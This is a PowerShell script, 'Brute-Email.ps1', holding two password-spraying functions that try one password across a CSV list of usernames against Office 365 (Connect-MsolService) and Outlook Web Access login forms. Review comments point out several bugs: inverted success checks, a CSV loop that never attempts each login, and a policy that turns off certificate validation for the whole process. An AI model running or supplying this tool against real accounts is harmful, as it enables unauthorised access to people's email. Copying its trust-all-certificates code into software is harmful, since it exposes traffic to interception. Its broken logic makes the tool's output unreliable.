Brute-Email.ps1
function Brute-365 {
<#
.SYNOPSIS
Attempts to login to Office 365 accounts using the Azure PowerShell module
Author: Steve Borosh (@424f424f)
Required Dependencies: Azure PowerShell module containing "Connect-Msolservice". http://connect.microsoft.com/site1164/Downloads/DownloadDetails.aspx?DownloadID=59185
Optional Dependencies: None
.DESCRIPTION
Using a csv with a header column of "Username", iterates through each user
attempting to log into the Office 365 service. Note: at the time of writing
this module, there is no default account lockout. However, system administrators
may enable lockout thresholds. Has optional parameter to beep when a login is successful
.EXAMPLE
Brute-365 -csv .\targets.csv -Password "Winter2016!" -Beep
#>
# Review notes (what the code below actually does):
# - One password is paired with every "Username" row of the CSV and passed to
#   Connect-MsolService, one call per row, with no delay between calls. On the
#   service side this would be expected to appear as sign-in attempts for many
#   accounts from a single client in a short window.
# - The lockout remark in .DESCRIPTION is dated ("at the time of writing");
#   lockout and throttling depend on the tenant's current configuration.
# - When -Username is supplied, nothing runs: the whole body sits inside
#   `if (!$Username)`, so the function returns without output.
Param(
[Parameter(Mandatory=$False)]
[String]$csv,
[Parameter(Mandatory=$False)]
[String]$Username,
# -Password is a plain [String]: the value is visible on the command line and in
# history, transcripts and script-block logs. Because the parameter is mandatory,
# the `= $Null` default is never used.
[Parameter(Mandatory=$True)]
[String]$Password = $Null,
[Parameter(Mandatory=$False)]
[Switch]$Beep
)
if (!$Username) {
if (!$csv) {
Write-Output "A username or CSV is required! Exiting.."
# NOTE(review): `Break` outside a loop is not a function return; PowerShell
# looks for an enclosing loop in the caller and may stop the calling script.
Break
}
# Each CSV row is expected to expose a "Username" property (header column).
$usernames = Import-CSV $csv
foreach($user in $usernames) {
$username = $($user.Username)
# Wrap the plaintext password so it can be placed in a PSCredential.
$secpasswd = ConvertTo-SecureString $password -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ($username, $secpasswd)
# No try/catch here: an error raised by Connect-MsolService is handled
# according to the caller's $ErrorActionPreference.
$connect = Connect-MsolService -Credential $mycreds
# NOTE(review): the message says "Successful" but the condition tests for the
# value 'Authentication Error'; -contains is a collection-membership test, not
# a substring test. Output from this branch should not be relied on.
if ($connect -contains 'Authentication Error') {
Write-Output "Logon Successful for $username"
if ($Beep) {
# 2000 Hz tone for 500 ms.
[console]::beep(2000,500)
}
}
}
}
}
function Brute-OWA {
<#
.SYNOPSIS
Attempts to login to Outlook Web Access accounts
Author: Gowdhaman Karthikeyan, Steve Borosh (@424f424f)
Reference: https://blogs.technet.microsoft.com/meamcs/2015/03/06/powershell-script-to-simulate-outlook-web-access-url-user-logon/
Required Dependencies: PowerShellv3
Optional Dependencies: None
.DESCRIPTION
Using a csv with a header column of "Username", iterates through each user
attempting to log into the Outlook Web Access. Note: at the time of writing
this module, there is no default account lockout. Beware of account lockout!
Has optional parameter to beep when a login is successful.
.EXAMPLE
Brute-OWA -csv .\targets.csv -Password "Winter2016!" -Beep
#>
# https://blogs.technet.microsoft.com/meamcs/2015/03/06/powershell-script-to-simulate-outlook-web-access-url-user-logon/
# Review notes (what the code below actually does):
# - Request sequence per call: GET $URL, POST $URL/auth/owaauth.dll, optionally a
#   request to $URL/lang.owa, then GET $URL/auth/logoff.aspx?Cmd=logoff&src=exch.
#   No -UserAgent is passed, so the requests carry Invoke-WebRequest's default
#   User-Agent; web-server logs for these paths are where the activity is visible.
# - Certificate validation is switched off for the whole PowerShell process
#   (see the ServicePointManager assignment) and is never restored.
# - The CSV loop only prints each name; the single login sequence after it uses
#   whatever value $Username holds once the loop has finished.
# - The .EXAMPLE omits -URL and -Domain, which are both mandatory.
Param(
[Parameter(Mandatory=$true)]
[String]$URL,
[Parameter(Mandatory=$true)]
[String]$Domain,
[Parameter(Mandatory=$false)]
[String]$csv,
[Parameter(Mandatory=$False)]
[String]$Username,
# Plain [String]: visible on the command line and in history, transcripts and
# script-block logs.
[Parameter(Mandatory=$true)]
[String]$Password,
[Parameter(Mandatory=$False)]
[Switch]$Beep
)
#Initialize default values
# $Latency is initialised here but never updated or reported below.
$Result = $False
$StatusCode = 0
$Latency = 0
if (!$Username) {
if (!$csv) {
Write-Output "A username or CSV is required! Exiting.."
# NOTE(review): `Break` outside a loop is not a function return; PowerShell
# looks for an enclosing loop in the caller and may stop the calling script.
Break
}
$usernames = Import-CSV $csv
foreach($user in $usernames) {
# PowerShell variable names are case-insensitive, so this assigns to the
# $Username parameter; the loop body does nothing except print the value.
$username = $($user.Username)
write-host "here" $username
}
}
# Build the DOMAIN\user logon name submitted in the form.
$Username = $Domain + "\" + $Username
try {
#########################
#Workaround to trust all certificates, taken from the referenced post.
# NOTE(review): the policy class below returns true for every certificate, and
# ServicePointManager.CertificatePolicy is a static, process-wide setting. After
# this line, every HTTPS request made from this session through this stack
# skips certificate validation, not only the requests in this function.
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
# No stopwatch is created here, despite the original comment; the logon name is
# simply echoed to the output stream.
Write-Output $username
#Invoke the login page
# -SessionVariable stores the cookie/session container in $owa for later requests.
$Response = Invoke-WebRequest -Uri $URL -SessionVariable owa
#Login Page – Fill Logon Form
# Only proceeds if the first form on the page has id "logonform"; otherwise
# $Result stays $False and no login request is sent.
if ($Response.forms[0].id -eq "logonform") {
$Form = $Response.Forms[0]
$Form.fields.username= $Username
$form.Fields.password= $Password
$authpath = "$URL/auth/owaauth.dll"
#Login to OWA
$Response = Invoke-WebRequest -Uri $authpath -WebSession $owa -Method POST -Body $Form.Fields
#SuccessfulLogin
# The outcome is inferred from the id of the first form in the response:
# "frm" and "lngfrm" are treated as logged in, "logonform" as still on the login page.
if ($Response.forms[0].id -eq "frm") {
#Retrieve Status Code
$StatusCode = $Response.StatusCode
# Logoff Session
$logoff = "$URL/auth/logoff.aspx?Cmd=logoff&src=exch"
$Response = Invoke-WebRequest -Uri $logoff -WebSession $owa
# No latency is calculated; only the result flag is set.
$Result = $True
}
#Fill Out Language Form, if it is first login
elseif ($Response.forms[0].id -eq "lngfrm") {
$Form = $Response.Forms[0]
#Set Default Values
# Submits the language and time-zone values already selected on the page.
$Form.Fields.add("lcid",$Response.ParsedHtml.getElementById("selLng").value)
$Form.Fields.add("tzid",$Response.ParsedHtml.getElementById("selTZ").value)
$langpath = "$URL/lang.owa"
$Response = Invoke-WebRequest -Uri $langpath -WebSession $owa -Method $form.Method -Body $form.fields
#Retrieve Status Code
$StatusCode = $Response.StatusCode
# Logoff Session
$logoff = "$URL/auth/logoff.aspx?Cmd=logoff&src=exch"
$Response = Invoke-WebRequest -Uri $logoff -WebSession $owa
$Result = $True
}
elseif ($Response.forms[0].id -eq "logonform") {
#We are still in LogonPage
#Retrieve Status Code
$StatusCode = $Response.StatusCode
# No latency is calculated; $Result becomes a message string instead of a boolean.
$Result = "Failed to logon $username. Check the password or account."
}
}
}
#Catch Exception, If any
catch
{
#Retrieve Status Code
# $Response here is whatever the last completed request returned (possibly
# nothing), not the response of the request that threw.
$StatusCode = $Response.StatusCode
# The pattern is unanchored: any value containing three consecutive digits passes.
if ($StatusCode -notmatch '\d\d\d') {$StatusCode = 0}
$Result = $_.Exception.Message
}
# $StatusCode is collected above but never written out.
Write-Output "Result: $Result"
# NOTE(review): -notcontains is a collection-membership test, not a substring
# test; with a scalar $Result it is true unless $Result equals "Failed" exactly,
# so this condition does not separate the failure message from other results.
if ($Result -notcontains "Failed") {
if ($Beep) {
# 2000 Hz tone for 500 ms.
[console]::beep(2000,500)
}
}
}